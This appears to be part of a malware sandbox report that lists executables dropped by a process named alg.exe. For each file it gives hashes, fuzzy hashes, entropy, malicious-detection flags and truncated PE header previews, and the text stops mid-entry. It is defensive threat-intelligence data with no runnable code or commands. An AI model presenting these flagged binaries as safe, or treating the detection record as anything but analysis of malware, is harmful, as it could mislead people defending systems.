SHA1: E34D814CC0160AADDF697D47107DF4A5FC8115CF
SHA-256: F7B4357C60863DD37DBBBCC5290B76146AED1929E383166E65D992D3460661EF
SHA-512: D46D05CDE4321E95BD9CA7DB4340877C45B33DAB94D1F7EA964AA025B25EDCF6B2EF7F8754CB8E0AE373DA557D93792E0B463B2902F660068219F1F63C898219
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1318400
Entropy (8bit): 7.4487895034278075
Encrypted: false
SSDEEP: 24576:reR0gB6axoCf0R6RLQRF/TzJqe58BimcsqjnhMgeiCl7G0nehbGZpbD:lgHxmR6uBTzge5MimIDmg27RnWGj
MD5: 662EBACD61161FB62CF8E54AFB604CC4
SHA1: 2580FDD05E7D16E7F816B47D7A8B6C04DAD3B869
SHA-256: 8A87F384B258971EB7DBD82022EE941DF22A008BF18D5482370A9255365EBEA0
SHA-512: 90C6AC7CAC7C8FCAA180621804476B6AA8478CE6A081F509B1C81FB224EE989BDF0DD0C0ED7C9433BE1DACCBBBBD6A3D9390D9F540D96C5F4BC78835E1B7CA39
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1375232
Entropy (8bit): 5.446064672330864
Encrypted: false
SSDEEP: 12288:JnEbH0j4x7R6SvyCMmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:JkwOtO7msqjnhMgeiCl7G0nehbGZpbD
MD5: 9FF67394FAE7FBE1B241D95BCEF303E1
SHA1: 74CEBB1883AAF225EF583DB690F254E5812AE680
SHA-256: 6AD93FC6F8E4D28F562B4F299C31A6D6AFF6E073C63C1D91BF41D2817088BD8F
SHA-512: 18C38FA0AA2702CD93E44B4EE32E408C15ACF35316388D078F8561586AE469E742D659628019E218CC15C50BD434214555E6D026DF7E4C725F6516D7B585D097
Malicious: true
Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
Entropy (8bit):5.446820095839598
Encrypted:false
SSDEEP:24576:anU/h/4KJsqjnhMgeiCl7G0nehbGZpbD:aU/VNDmg27RnWGj
MD5:949E69748A45C07767A39247ED30EE08
SHA1:BCEA70182A91CC93E98654C1C33E2A3B03B2EE89
SHA-256:4ACFE725BA62E194B6467DB0EB0AFAD915C1D54F9B13F607B665D7693F8A904B
SHA-512:C7808989BF9F175C79ABA31A03B6E454933014A32A3EB0A4A570EE8534CF5B3760574DDE3A531D39D4B37E01A1C9265E2EC774753A6A97319D6C9884EEE80922
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):5.4837394867857165
Encrypted:false
SSDEEP:24576:Cx71iBLZ05jNTmJWExKsqjnhMgeiCl7G0nehbGZpbD:CxhiHIjNgeDmg27RnWGj
MD5:857B0BC9288D3EB9973CA651CE5F2348
SHA1:49CACEE35725A47D876B0940A7D427C2BF382B17
SHA-256:F217F3DB0A03E365319643656FB518279B5A9E30CC1035B37A638A972061EE73
SHA-512:9D18E68A08D2D890ABE1E3597F3D8FC722332F2DE3EACEF42AD5E506FE1C568542D29FB91AA9BA632EC2AE9DB8AC9AA3834E2FCA8D8AAA05ECBEC5E9FF411789
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1419264
Entropy (8bit):5.46670460567732
Encrypted:false
SSDEEP:24576:1lnRklQ6fgJcEwix0sqjnhMgeiCl7G0nehbGZpbD:ZoRfgJcEwCQDmg27RnWGj
MD5:FFC4340D0A214C8FAFFD6A8841CAF1FF
SHA1:4E91F562E2CB2F1EFFE0FD2E9AF1DEC1D0796CD0
SHA-256:E4B42B1B9AFF666B31F94D7BE16E790E359F0570F6823D898E14497394CF40F3
SHA-512:26228E339A891B7DF18EB0AFC7C51D8D67E5CE32903875CE25A711A861ECAA4F6390661BA087340A79A19A1C9666962E634F196D3193A42D2428ADA56D615E1C
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1522176
Entropy (8bit):5.496524999393751
Encrypted:false
SSDEEP:24576:iW25k8hb0Haw+xksqjnhMgeiCl7G0nehbGZpbD:iWyk8SHawmADmg27RnWGj
MD5:48F56F9DEACA01A4983DCE11382B2F5E
SHA1:23C67857FD7A77E6466E8AB6B3D0BC774B9EAFAC
SHA-256:04E7C20742A3722ED7495B234EFB6C74F2928B1C28425FE6D58F7A1C24A22B12
SHA-512:0E27684C118E33AC4CD2EADDC0A13F00D63E44FADE340B57E7A0F1AF8E50C86E1DBD048916D5D23A2F3B9A854E16CC87C1ADFB3B546888F1BA13C8C433F41276
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@.......................................... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163944172277405
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:NWP/aK2vB+rXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:NKCKABssqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:0E853AF5373CA10E55D6C3FC0F7B53BB
                                                                                                                                                                                                                                                                                                                                                    SHA1:335FFE1E8CDBF17CB635159A7D8F3AA197E5A091
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2626236F6C570D956ABDEA91A50743991190F3F3D0C458902D78B66D225545BB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:A1C7D6878BD036AC470F0D145724816F6D87E2917ED1657C36A6D12A4CC3643FAACBBB7BDAA4F77BEE1436870585A123BD1E76027CAF84DBDB78ED27DEC42DF8
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@..................................!......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.162018650281261
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:SO7cCNWB+09ZXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:PjNWBP7sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:6D0125C239A931DBE5A1F37C4257332A
                                                                                                                                                                                                                                                                                                                                                    SHA1:F2F1926CAC636DCC446E556F582F9637365B8E54
                                                                                                                                                                                                                                                                                                                                                    SHA-256:821E87D128C6DF4B9C225A26A2C0736F9D37EE30FAC1A69E22A9C3C3979052D3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:FAFEA2D3F29F41EE5EC7BE9FCD125B0C24F1345ADA9C58F7EEB0565E5FDD163CDEF04C0912609C0A65C3D9399253E9564ACB8597F1A8983D53FAB892D97BC2DD
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.238925859112943
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:sihRyhdsRrVsqjnhMgeiCl7G0nehbGZpbD:sihsoRJDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:6FDF2A7A7FADA114254365FC157E5B4D
                                                                                                                                                                                                                                                                                                                                                    SHA1:9DB31D220576932D66C6C80D5185EF658DB84631
                                                                                                                                                                                                                                                                                                                                                    SHA-256:C033162498FFD5EDB5D31BA488AC191A72C6B43BB5E782EC131A3A6CB9D54DDF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:697F11BA538AB63CEA521479C826F91D22F356060B26AAD1CE8598EF649356A6862D019611C6D0DE27250D211D8091DA867EDA7E886E408060C49ADDACB6422D
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p......P..... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.351010103752525
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:c1FDmRF+wpx/Qaf+sqjnhMgeiCl7G0nehbGZpbD:6mRF+wn/JfSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:370D58FB5581A619E9DAFEF0C7F01FB9
                                                                                                                                                                                                                                                                                                                                                    SHA1:EDE9825B937819A33577101183E1671366070709
                                                                                                                                                                                                                                                                                                                                                    SHA-256:62193342C3A7F1929F7B97A24A8FA7265FE5FE53E86E6374381EAD48CCA249DD
                                                                                                                                                                                                                                                                                                                                                    SHA-512:04505CD7A2FAA785145AA79DBE438A496E15008BCAE71B62C0D5586AE3CB22A580F2FC777BFB063DE564FBB70CB37C46991B1D792BAE6E343C9EACD6F8EA5326
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.161982612835274
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:B2Ae621B+0YfXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:IE21BPIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:662FD073A762F15C78D41D64D16AB4B1
                                                                                                                                                                                                                                                                                                                                                    SHA1:BC8E01E1E37CF3425727C59AC7CEE04721AB018E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:760B4948721795FCAFEC4132E691D022B2B682D0397EC27FC3A5E19E7F3A6ECC
                                                                                                                                                                                                                                                                                                                                                    SHA-512:DF438EF155156EE3F84AFF0B7D4289F0FDA8BEFF07B6AB967BB03AAD9224609EF599804C13A19F2A015CBB62E242AAAA8D373E2EED6AF452F13B4042C13F64DF
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4877824
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997099329500399
                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:nvHFftsBuLnimh3Q/85ICWcV/2ZNGQM3D527BWG:5GBg/3QU5tPmGVQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:FC4D807E58AB0BE08C25F7440E254B4A
                                                                                                                                                                                                                                                                                                                                                    SHA1:B0F3105195F07A4E9727167346CD464A79A73BC2
                                                                                                                                                                                                                                                                                                                                                    SHA-256:CAC90E922AC5FC97A065E0E9B2583AAA6B05E0D7651EC78FDB5576C5B4EAF5A7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:1E17E054CD44F751770C5460B6741DCE6C7CC2378B1709DEE85178763F1DCBE972ED8D6985760529B0FA3BFBF3DFC28867CDA262CF4E2F78B325D6FEE51D88E1
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......4...VA................@..............................J.......J... ..................................................X..P.......04A.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc...04A......6A..X..............@..@.reloc........A.......A.............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4877824
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.997099237921247
                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:AvHFftsBuLnimh3Q/85ICWcV/2ZNGQM3D527BWG:MGBg/3QU5tPmGVQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:743ECDBCA43FF37B2B6C8C28BFA28D43
                                                                                                                                                                                                                                                                                                                                                    SHA1:97456B61E46A1BE0C14FF156DC4D72B782CA5335
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F0471372FA9D93D651CA2A78FEA4ED34A748F82AAD0EBBEA9D48BD6BFC7D1E77
                                                                                                                                                                                                                                                                                                                                                    SHA-512:766AC1F95F89757C40BD3D9643B4A82042AA4CE420155F3B897F2E88ABF4640EE0F81BE7FD115947A645F098DEF39A5BAEB0E91C3F0A1765B30B50D258ACE71F
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......4...VA................@..............................J.....d.J... ..................................................X..P.......04A.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc...04A......6A..X..............@..@.reloc........A.......A.............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1158144
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.068079038263284
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:QsXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QssqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:3EC7D44C051B4CD6A52FB3D3F06BB801
                                                                                                                                                                                                                                                                                                                                                    SHA1:05487808F4F047E323333198EC25A91EEA870507
                                                                                                                                                                                                                                                                                                                                                    SHA-256:50350AA9001ABBEA55A2C15A21DDBBEA7E13F663568BA16DC6627F2B19903F60
                                                                                                                                                                                                                                                                                                                                                    SHA-512:A5AE0EE0FDC374B4F6C8B5FACC5F830CE1364191D5DAF7DC8C07CA70898522CE32ED3B46191341AC4DEDCEF1027F9DAC56A29EB6D7CDE682F52BB071D32BE7E2
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@..................................I......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0324110643820195
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:sKLXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5LsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:F6C48526D6E2D2BFA2B5B445608AD598
                                                                                                                                                                                                                                                                                                                                                    SHA1:8A9E62C04A9F767D32810291A9D76505B2758E94
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9348B47A63894CF86E73C3E3A25CA04FA4BFB5A8F57ED2A8F84387809342023E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:947014A63C49E8279FA45CD4D55B25E17A1EF09BFC24A3D563A5F9C3C042655AEAF21D954FE691E054386E4F4041F608B99601BD99257D0B9C984BED7EF3C5CD
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................3........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446065022744214
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:FnEbH0j4x7R6SvyCMmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:FkwOtO7msqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:AFDC2E150FA33130F7DAFD054A540DA2
                                                                                                                                                                                                                                                                                                                                                    SHA1:6E01FFB8C7D31DD530BD7386097DA90C1F291514
                                                                                                                                                                                                                                                                                                                                                    SHA-256:BE4A2B90F614983F75810B4523A212B75E112720D1130BA144222C40190F5DC0
                                                                                                                                                                                                                                                                                                                                                    SHA-512:BC11042C5AF46D8E7041CCB4975C538B7B95D61408392B25CB592AAF6DAF9DAD5E2B24739CB0D1DC9BA741CD84B15176B79CEF5C3841F41D6B41DA7EBECFA846
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......'.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1212416
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.119728892638051
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:mv1vvXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:a13sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:C7089C5121A258DE5A0AEF2C0C7B302D
                                                                                                                                                                                                                                                                                                                                                    SHA1:B0F28207A1E9DF4975AA3E5962F08CA4B5AF855A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7584DF2EC895FE38942E10A109A38E2EA8AB45B36B445408AB6FE699788303FF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:BB1FA7B3925B30F6EBDD1DD77543B1EF8A898A030F69CEFC473A7B2CEB669FCB2418B553710040EE87F7FBAFF027BF63C7F4CC8747124527361DFDCA622C7276
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446821276862672
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
